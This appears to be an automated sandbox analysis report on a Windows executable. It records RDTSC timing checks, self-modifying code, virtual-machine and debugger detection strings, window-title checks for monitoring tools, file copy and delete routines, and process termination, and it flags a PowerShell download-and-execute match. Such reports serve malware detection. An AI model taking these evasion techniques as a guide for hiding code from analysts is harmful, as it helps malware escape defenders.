                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81E45 second address: E81E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81E54 second address: E81E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE478BEC54Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81E68 second address: E81E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007FE478F58EBCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8256A second address: E8256E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8256E second address: E82574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82574 second address: E825A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE478BEC556h 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnl 00007FE478BEC546h 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jng 00007FE478BEC548h 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E825A8 second address: E825AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A000 second address: E8A00A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE478BEC552h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E1F5 second address: E8E201 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE478F58EB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCB873 second address: DCB88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE478BEC555h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCB88F second address: DCB8A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCB8A7 second address: DCB8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8278 second address: DC8281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EACDC0 second address: EACDC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EACDC4 second address: EACDC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EACDC8 second address: EACDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE478BEC54Fh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EACDE5 second address: EACDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAF128 second address: EAF12D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAF12D second address: EAF145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE478F58EBDh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAF145 second address: EAF153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC54Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2079 second address: EB2089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FE478F58EB6h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2089 second address: EB2090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2090 second address: EB209C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FE478F58EB6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB87BB second address: EB87D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007FE478BEC548h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e jbe 00007FE478BEC554h 0x00000014 pushad 0x00000015 jc 00007FE478BEC546h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB70A3 second address: EB70A8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB79A6 second address: EB79AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7B46 second address: EB7B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE478F58EBDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC38EC second address: EC38F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE478BEC546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7C9B second address: ED7CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7CA1 second address: ED7CE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC558h 0x00000007 jnl 00007FE478BEC546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE478BEC556h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6905 second address: EE6909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6909 second address: EE6916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6916 second address: EE693A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478F58EC8h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE693A second address: EE693E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE693E second address: EE6952 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE478F58EBAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6952 second address: EE6956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6956 second address: EE695C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6BDB second address: EE6BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6BDF second address: EE6BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6BE5 second address: EE6C11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE478BEC551h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FE478BEC54Fh 0x00000011 push edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6ED3 second address: EE6EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE478F58EB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE71D1 second address: EE71D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE748A second address: EE749A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE749A second address: EE74AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE478BEC546h 0x0000000a je 00007FE478BEC546h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE74AE second address: EE74C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478F58EBFh 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FD2 second address: EE8FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FD8 second address: EE8FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FDE second address: EE8FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8FE2 second address: EE9017 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE478F58EC7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9017 second address: EE901B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBE23 second address: EEBE27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED2D4 second address: EED2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EED2D8 second address: EED2E4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE478F58EB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEF380 second address: EEF39C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE478BEC556h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEF39C second address: EEF3A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55503F3 second address: 5550402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5550402 second address: 55504EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 3Fh 0x0000000d pushfd 0x0000000e jmp 00007FE478F58EC9h 0x00000013 add ax, 3076h 0x00000018 jmp 00007FE478F58EC1h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FE478F58EC7h 0x00000027 adc ch, FFFFFFAEh 0x0000002a jmp 00007FE478F58EC9h 0x0000002f popfd 0x00000030 mov ecx, 2B924237h 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FE478F58EBFh 0x00000040 add ecx, 213CCBBEh 0x00000046 jmp 00007FE478F58EC9h 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007FE478F58EC0h 0x00000052 or esi, 453E64B8h 0x00000058 jmp 00007FE478F58EBBh 0x0000005d popfd 0x0000005e popad 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55504EA second address: 5550502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC554h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5550502 second address: 5550506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5550506 second address: 555051C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE478BEC54Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555051C second address: 555053B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push ebx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE478F58EC2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555053B second address: 5550541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5550541 second address: 5550545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1110F second address: E1113B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE478BEC557h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1113B second address: E11140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1139A second address: E113A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C5DA67 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C5DB2F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E04F5B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38671
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009840F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009840F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0097E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0097F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009847C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009847C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00971710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00971710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0097DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00983B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00983B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00984B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00984B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0097EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0097BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0097DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00971160 GetSystemInfo,ExitProcess,0_2_00971160
                Source: file.exe, file.exe, 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareC
                Source: file.exe, 00000000.00000002.2241492320.0000000001843000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2241492320.0000000001876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37484
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37487
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37498
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37503
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37538
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37372
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00974610 VirtualProtect ?,00000004,00000100,000000000_2_00974610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00989BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989AA0 mov eax, dword ptr fs:[00000030h]0_2_00989AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00987690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00987690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5912, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00989790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009898E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_009898E0
                Source: file.exe, file.exe, 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B7588 cpuid 0_2_009B7588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00987D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00986BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00986BC0
